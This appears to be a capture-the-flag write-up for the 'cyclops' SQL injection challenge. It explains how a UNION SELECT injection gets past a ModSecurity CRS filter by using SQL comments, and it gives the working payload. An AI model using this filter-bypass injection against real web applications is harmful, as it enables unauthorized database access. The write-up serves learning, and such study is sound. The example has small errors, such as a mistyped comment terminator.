cyclops

We are provided with the SQL query:

SELECT id,pw FROM prob_cyclops WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'

In this challenge as well, the Mod Security CRS is being used. For this challenge, we have to use the UNON SELECT statement.

Let's try that by providing the following URI parameter:

?id=UNION SELECT

The resultant query becomes:

SELECT id,pw FROM prob_cyclops WHERE id='' UNION SELECT '' AND pw=''

As we can see, the input gets blocked. In order to get around this we have to use multi-line comments.

Multi-line comments

In SQL, multi-line comments are effective while commenting out large groups of text.

SELECT * FROM table
/*
SELECT * FROM table
SELECT * FROM table
/*

We can utilize this to introduce space between the UNION and SELECT words as such:

UNION
/*
*/
SELECT

In order to get around the MOD Security filter, we can use the previously used bypass and modify it to our needs. We need to select the first and second columns in order to solve this challenge.

If we provide the following URI parameter:

?id=-1'<@=1 UNION/**/SELECT 'first','second' -- -

The resultant query becomes:

SELECT id,pw FROM prob_cyclops WHERE id='-1'<@=1 UNION
/*
*/
SELECT 'first','second' -- -' AND pw=''

Multi-line comments​

Multi-line comments